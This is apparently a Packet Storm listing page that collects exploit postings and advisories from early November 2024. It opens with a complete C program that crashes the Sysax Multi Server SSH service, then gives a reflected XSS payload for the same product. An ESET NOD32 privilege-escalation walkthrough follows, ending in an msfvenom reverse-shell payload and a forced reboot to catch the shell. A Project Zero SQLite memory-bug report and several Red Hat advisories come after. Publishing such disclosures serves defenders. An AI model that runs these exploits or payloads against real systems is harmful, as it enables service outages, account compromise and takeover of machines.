Sysax Multi Server version 6.9.9 suffers from an SSH related denial of service vulnerability.

    # Exploit Title: Sysax Multi Server 6.99 - SSH Denial of Service# Date: 2024-11-03# Exploit Author: Yehia Elghaly (Mrvar0x)# Vendor Homepage: https://www.sysax.com/# Software Link: https://www.sysax.com/download/sysaxserv_setup.msi# Version: Sysax Multi Server 6.99# Tested on: Windows 10 x64#Steps --> Compile (gcc -o ssh ssh.c)#Steps --> Run (sudo ./ssh <Target IP> <Port>)#Steps --> Crash (SSH Crashed)#include <stdio.h>#include <stdlib.h>#include <string.h>#include <unistd.h>#include <arpa/inet.h>#include <sys/socket.h>#include <netinet/tcp.h>void error_handling(const char *message) {    perror(message);    exit(1);}int main(int argc, char *argv[]) {    if (argc != 3) {        printf("Usage: %s <IP> <Port>\n", argv[0]);        exit(1);    }    const char *host = argv[1];    int port = atoi(argv[2]);        unsigned char packet[] = {0x01, 0x02, 0x03, 0x04, 0xAA, 0xBB, 0xCC, 0xDD,      0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0,      0x44, 0x55, 0x66, 0x77, 0x88, 0x99, 0x00, 0xFF,      0x10, 0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x80,      0x5A, 0x5A, 0x5A, 0x5A, 0x5A, 0x5A, 0x5A, 0x5A,      0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF,      0x0F, 0x0E, 0x0D, 0x0C, 0x0B, 0x0A, 0x09, 0x08,      0xF1, 0xE2, 0xD3, 0xC4, 0xB5, 0xA6, 0x97, 0x88,      0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF,      0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77,    0x88, 0x99, 0xAA, 0xBB, 0xCC, 0xDD, 0xEE, 0xFF,    0xFF, 0xEE, 0xDD, 0xCC, 0xBB, 0xAA, 0x99, 0x88,    0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11, 0x00,  };  int sock = socket(AF_INET, SOCK_STREAM, 0);    if (sock == -1) {        error_handling("Socket creation failed");    }    int flag = 1;    setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (char *)&flag, sizeof(int));    struct linger sl = {1, 0}; // Close immediately    setsockopt(sock, SOL_SOCKET, SO_LINGER, &sl, sizeof(sl));    struct sockaddr_in serv_addr;    memset(&serv_addr, 0, sizeof(serv_addr));    serv_addr.sin_family = AF_INET;    serv_addr.sin_addr.s_addr = inet_addr(host);    serv_addr.sin_port = htons(port);    if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) == -1) {        error_handling("Connect failed");    }    const char *ssh_banner = "SSH-2.0-OpenSSH_7.1p1 Debian-5ubuntu1\r\n";    if (send(sock, ssh_banner, strlen(ssh_banner), 0) == -1) {        error_handling("Failed to send SSH banner");    }    usleep(100000);     for (int i = 0; i < 5; ++i) {        if (send(sock, packet, sizeof(packet), 0) == -1) {            error_handling("Failed to send payload");        }        usleep(50000); // Short delay between sends    }    printf("Payload sent successfully.\n");    char buffer[1024];    ssize_t bytes_received = recv(sock, buffer, sizeof(buffer) - 1, 0);    if (bytes_received > 0) {        buffer[bytes_received] = '\0';        printf("Received response: %s\n", buffer);    } else {        printf("No response received or connection closed.\n");    }    close(sock);    return 0;}

Sysax Multi Server 6.99 SSH Denial Of Service

Sysax Multi Server version 6.9.9 suffers from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: Sysax Multi Server 6.99 - Reflected XSS# Date: 2024-11-03# Exploit Author: Yehia Elghaly (Mrvar0x)# Vendor Homepage: https://www.sysax.com/# Software Link: https://www.sysax.com/download/sysaxserv_setup.msi# Version: MultiServer 6.99# Tested on: Windows 10 x64Reflected XSS - Affected Parameter  (/scgi?sid).PoC:192.168.1.160/scgi?sid=44abd541f5a769556f36080e7c8a7b1f68e04510<script>alert("XSS")</script>&pid=transferpage2_name1_fff.htm

Sysax Multi Server 6.99 Cross Site Scripting

IBM Security Verify Access versions prior to 10.0.8 suffer from authentication bypass, reuse of private keys, local privilege escalation, weak settings, outdated libraries, missing password, hardcoded secrets, remote code execution, missing authentication, null pointer dereference, and lack of privilege separation vulnerabilities.

IBM Security Verify Access 32 Vulnerabilities

IBM Security Verify Access Appliance suffers from multiple insecure transit vulnerabilities, hardcoded passwords, and uninitialized variables. ibmsecurity versions prior to 2024.4.5 are affected.

IBM Security Verify Access Appliance Insecure Transit / Hardcoded Passwords

ESET NOD32 Antivirus version 18.0.12.0 suffers from an unquoted service path vulnerability.

    # Exploit Title: ESET NOD32 Antivirus 18.0.12.0 - "ESET Service" UnquotedService Path# Exploit Author: Milad Karimi (Ex3ptionaL)# Exploit Date: 2024-11-02# Contact: miladgrayhat@gmail.com# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL# MiRROR-H: https://mirror-h.org/search/hacker/49626/# Vendor : https://www.eset.com# Version : 18.0.12.0# Tested on OS: Microsoft Windows 10 pro x64About Unquoted Service Path :==============================When a service is created whose executable path contains spaces and isn'tenclosed within quotes, leads to a vulnerability known as Unquoted ServicePath which allows a user to gain SYSTEM privileges.(only if the vulnerable service is running with SYSTEM privilege levelwhich most of the time it is).Description:==============================ESET NOD32 Antivirus installs a service with an unquoted service path.To properly exploit this vulnerability, the local attacker must insert anexecutable file in the path of the service.Upon service restart or system reboot, the malicious code will be run withelevated privileges.# PoC===========1.  Open CMD and check for the vulnerability by typing [ wmic service getname,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v"c:\windows\\" | findstr /i /v """ ]2.  The vulnerable service would show up.3.  Check the service permissions by typing [ sc qc "ekrn" ]4.  The command would return..C:\Users\Ci3c0>sc qc ekrn[SC] QueryServiceConfig SUCCESSSERVICE_NAME: ekrn        TYPE               : 20  WIN32_SHARE_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : "C:\Program Files\ESET\ESET Security\ekrn.exe"        LOAD_ORDER_GROUP   : Base        TAG                : 0        DISPLAY_NAME       : ESET Service        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystem5.  This concludes that the service is running as SYSTEM.6.  Now create a payload with msfvenom or other tools and name it toekrn.exe.7.  Make sure you have write permissions to "C:\Program Files\ESET\ESETSecurity" directory.8.  Provided that you have right permissions, drop the HDDHealthService.exeexecutable you created into the "C:\Program Files\ESET\ESET Security"directory.9.  Start a listener.9.  Now restart the ekrn service by giving coommand [ sc stop ekrn ]followed by [ sc start ekrn ]9.1 If you cannot stop and start the service, since the service is of type"AUTO_START" we can restart the system by executing [ shutdown /r /t 0 ]and get the shell when the service starts automatically.10. Got shell.During my testing :Payload : msfvenom -p windows/shell_reverse_tcp -f exe -o ekrn.exe# Disclaimer=============The information contained within this advisory is supplied "as-is" with nowarranties or guarantees of fitness of use or otherwise.The author is not responsible for any misuse of the information containedherein and accepts no responsibility for any damage caused by the use ormisuse of this information.The author prohibits any malicious use of security related information orexploits by the author or elsewhere.

ESET NOD32 Antivirus 18.0.12.0 Unquoted Service Path

SQLite3 suffers from a stack buffer underflow condition in seriesBestIndex in the generate_series extension.

    Vulnerability detailsstatic int seriesBestIndex(  sqlite3_vtab *pVTab,  sqlite3_index_info *pIdxInfo){  int i, j;              /* Loop over constraints */  int idxNum = 0;        /* The query plan bitmask */#ifndef ZERO_ARGUMENT_GENERATE_SERIES  int bStartSeen = 0;    /* EQ constraint seen on the START column */#endif  int unusableMask = 0;  /* Mask of unusable constraints */  int nArg = 0;          /* Number of arguments that seriesFilter() expects */  int aIdx[7];           /* Constraints on start, stop, step, LIMIT, OFFSET,                         ** and value.  aIdx[5] covers value=, value>=, and                         ** value>,  aIdx[6] covers value<= and value< */  const struct sqlite3_index_constraint *pConstraint;  /* This implementation assumes that the start, stop, and step columns  ** are the last three columns in the virtual table. */  assert( SERIES_COLUMN_STOP == SERIES_COLUMN_START+1 );  assert( SERIES_COLUMN_STEP == SERIES_COLUMN_START+2 );  aIdx[0] = aIdx[1] = aIdx[2] = aIdx[3] = aIdx[4] = aIdx[5] = aIdx[6] = -1;  pConstraint = pIdxInfo->aConstraint;  for(i=0; i<pIdxInfo->nConstraint; i++, pConstraint++){    int iCol;    /* 0 for start, 1 for stop, 2 for step */    int iMask;   /* bitmask for those column */    int op = pConstraint->op;    if( op>=SQLITE_INDEX_CONSTRAINT_LIMIT     && op<=SQLITE_INDEX_CONSTRAINT_OFFSET    ){      if( pConstraint->usable==0 ){[...]      }      continue;    }    if( pConstraint->iColumn==SERIES_COLUMN_VALUE ){      switch( op ){[...]      }      continue;    }    iCol = pConstraint->iColumn - SERIES_COLUMN_START;  // *** 1 ***    assert( iCol>=0 && iCol<=2 ); // *** 2 ***    iMask = 1 << iCol;#ifndef ZERO_ARGUMENT_GENERATE_SERIES    if( iCol==0 && op==SQLITE_INDEX_CONSTRAINT_EQ ){      bStartSeen = 1;    }#endif    if( pConstraint->usable==0 ){      unusableMask |=  iMask;      continue;    }else if( op==SQLITE_INDEX_CONSTRAINT_EQ ){      idxNum |= iMask;      aIdx[iCol] = i; // *** 3 ***    }  }  struct sqlite3_index_constraint {     int iColumn;              /* Column constrained.  -1 for ROWID */ // *** 4 ***     unsigned char op;         /* Constraint operator */     unsigned char usable;     /* True if this constraint is usable */     int iTermOffset;          /* Used internally - xBestIndex should ignore */  } *aConstraint;            /* Table of WHERE clause constraints */The seriesBestIndex function doesn't handle rowid constraints correctly. The code at [1] expects iColumn to be one of SERIES_COLUMN_START, SERIES_COLUMN_STOP, or SERIES_COLUMN_STEP (values 1, 2, or 3). However, the line can also be reached with a rowid constraint with an iColumn value of -1. Depending on the build configuration, the negative iCol may either trigger an assertion failure at [2] or lead to an out-of-bounds memory write access at [3].Version3.47.0 2024-10-05 12:02:17 2f7eab381e16760952d1c90a9119d2a217933f0136442d8f6eeb6d95e366ca4f (64-bit)Reproduction caseSELECT * FROM generate_series(1, 1) WHERE rowid = 1When built with assertions, the SQLite shell crashes with an assertion failure:shell.c:6816: seriesBestIndex: Assertion `iCol>=0 && iCol<=2' failed.When built with NDEBUG and ASan, the program produces the following crash report:==2623073==ERROR: AddressSanitizer: stack-buffer-underflow on address 0x7ff83210be18 at pc 0x55dbc9afcd14 bp 0x7ffc7a497cd0 sp 0x7ffc7a497cc8WRITE of size 4 at 0x7ff83210be18 thread T0    #0 0x55dbc9afcd13 in seriesBestIndex shell.c:6828    #1 0x55dbc9d5aaa9 in vtabBestIndex sqlite3.c:164633    #2 0x55dbc9d66290 in whereLoopAddVirtualOne sqlite3.c:167237    #3 0x55dbc9d67e57 in whereLoopAddVirtual sqlite3.c:167549    #4 0x55dbc9d69f06 in whereLoopAddAll sqlite3.c:167822    #5 0x55dbc9d73724 in sqlite3WhereBegin sqlite3.c:169776    #6 0x55dbc9d1b3d2 in sqlite3Select sqlite3.c:151580    #7 0x55dbc9d8c131 in yy_reduce sqlite3.c:177608    #8 0x55dbc9d98b5c in sqlite3Parser sqlite3.c:179058    #9 0x55dbc9d9cc59 in sqlite3RunParser sqlite3.c:180392    #10 0x55dbc9cf1863 in sqlite3Prepare sqlite3.c:143187    #11 0x55dbc9cf1f65 in sqlite3LockAndPrepare sqlite3.c:143262    #12 0x55dbc9cf2356 in sqlite3_prepare_v2 sqlite3.c:143349    #13 0x55dbc9b30f63 in shell_exec shell.c:24228    #14 0x55dbc9b58583 in runOneSqlLine shell.c:31909    #15 0x55dbc9b59624 in process_input shell.c:32097    #16 0x55dbc9b5d1b7 in main shell.c:33026    #17 0x7ff834243b89 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58    #18 0x7ff834243c44 in __libc_start_main_impl ../csu/libc-start.c:360    #19 0x55dbc9ae27a0 in _start (sq+0x4a7a0) (BuildId: 8e6639a5755a4687574b3d22d6cf593ca32bb8b6)Address 0x7ff83210be18 is located in stack of thread T0 at offset 24 in frame    #0 0x55dbc9afc4b6 in seriesBestIndex shell.c:6732  This frame has 1 object(s):    [32, 60) 'aIdx' (line 6740) <== Memory access at offset 24 underflows this variableWe've observed that, depending on the compiler and SQLite build configuration, this issue may allow an attacker to overwrite pConstraint, which makes it likely exploitable. However, the generate_series extension is only enabled by default in the shell binary and not the library itself, so the impact of the issue is limited.Credit informationSergei Glazunov of Google Project ZeroThis bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2025-01-07.For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html

SQLite3 generate_series Stack Buffer Underflow

khugepaged in Linux races with rmap-based zap, races with GUP-fast, and fails to call MMU notifiers.

Linux khugepaged Race Conditions

Red Hat Security Advisory 2024-8425-03 - Red Hat OpenShift Container Platform release 4.15.37 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include denial of service and traversal vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8425.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.15.37 bug fix and security update  
Advisory ID:        RHSA-2024:8425-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8425  
Issue date:         2024-11-04  
Revision:           03  
CVE Names:          CVE-2023-45288  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.15.37 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.15.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.15.37. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHSA-2024:8428

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.15/release_notes/ocp-4-15-release-notes.html

Security Fix(es):

* go-git: Maliciously crafted Git server replies can lead to path traversal  
and RCE on go-git clients (CVE-2023-49569)  
* golang: net/http, x/net/http2: unlimited number of CONTINUATION frames  
causes DoS (CVE-2023-45288)  
* encoding/gob: golang: Calling Decoder.Decode on a message which contains  
deeply nested structures can cause a panic due to stack exhaustion  
(CVE-2024-34156)  
* containers/image: digest type does not guarantee valid type  
(CVE-2024-3727)  
* net/http: Denial of service due to improper 100-continue handling in  
net/http (CVE-2024-24791)  
* cloudevents/sdk-go: usage of WithRoundTripper to create a Client leaks  
credentials (CVE-2024-28110)  
* jose-go: improper handling of highly compressed data (CVE-2024-28180)  
* go/parser: golang: Calling any of the Parse functions containing deeply  
nested literals can cause a panic/stack exhaustion (CVE-2024-34155)  
* go/build/constraint: golang: Calling Parse on a \"// +build\" build tag  
line with deeply nested expressions can cause a panic due to stack  
exhaustion (CVE-2024-34158)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.15 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.15/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2023-45288

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2258143  
https://bugzilla.redhat.com/show_bug.cgi?id=2268273  
https://bugzilla.redhat.com/show_bug.cgi?id=2268372  
https://bugzilla.redhat.com/show_bug.cgi?id=2268854  
https://bugzilla.redhat.com/show_bug.cgi?id=2274767  
https://bugzilla.redhat.com/show_bug.cgi?id=2295310  
https://bugzilla.redhat.com/show_bug.cgi?id=2310527  
https://bugzilla.redhat.com/show_bug.cgi?id=2310528  
https://bugzilla.redhat.com/show_bug.cgi?id=2310529  
https://issues.redhat.com/browse/OCPBUGS-19254  
https://issues.redhat.com/browse/OCPBUGS-37704  
https://issues.redhat.com/browse/OCPBUGS-39018  
https://issues.redhat.com/browse/OCPBUGS-41838  
https://issues.redhat.com/browse/OCPBUGS-42335  
https://issues.redhat.com/browse/OCPBUGS-42470  
https://issues.redhat.com/browse/OCPBUGS-42471  
https://issues.redhat.com/browse/OCPBUGS-42480  
https://issues.redhat.com/browse/OCPBUGS-42611  
https://issues.redhat.com/browse/OCPBUGS-42648  
https://issues.redhat.com/browse/OCPBUGS-42726  
https://issues.redhat.com/browse/OCPBUGS-42780  
https://issues.redhat.com/browse/OCPBUGS-42881  
https://issues.redhat.com/browse/OCPBUGS-42934  
https://issues.redhat.com/browse/OCPBUGS-42992  
https://issues.redhat.com/browse/OCPBUGS-43057  
https://issues.redhat.com/browse/OCPBUGS-43468  
https://issues.redhat.com/browse/OCPBUGS-43626  
https://issues.redhat.com/browse/OCPBUGS-43635

Red Hat Security Advisory 2024-8425-03

Red Hat Security Advisory 2024-8318-03 - Logging for Red Hat OpenShift - 5.6.25.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8318.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Logging for Red Hat OpenShift - 5.6.25Advisory ID:        RHSA-2024:8318-03Product:            logging for Red Hat OpenShiftAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8318Issue date:         2024-11-04Revision:           03CVE Names:          CVE-2024-24791====================================================================Summary: Logging for Red Hat OpenShift - 5.6.25Description:Logging for Red Hat OpenShift - 5.6.25Solution:https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.htmlhttps://docs.openshift.com/container-platform/4.11/logging/cluster-logging-upgrading.htmlCVEs:CVE-2024-24791References:https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2024-8318-03

Red Hat Security Advisory 2024-7323-03 - Logging for Red Hat OpenShift - 5.6.24.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7323.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Logging for Red Hat OpenShift - 5.6.24  
Advisory ID:        RHSA-2024:7323-03  
Product:            logging for Red Hat OpenShift  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:7323  
Issue date:         2024-11-04  
Revision:           03  
CVE Names:          CVE-2024-6104  
====================================================================

Summary: 

Logging for Red Hat OpenShift - 5.6.24

Description:

Logging for Red Hat OpenShift - 5.6.24

Solution:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

https://docs.openshift.com/container-platform/4.12/logging/cluster-logging-upgrading.html

CVEs:

CVE-2024-6104

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://issues.redhat.com/browse/LOG-5950

Source

Packet Storm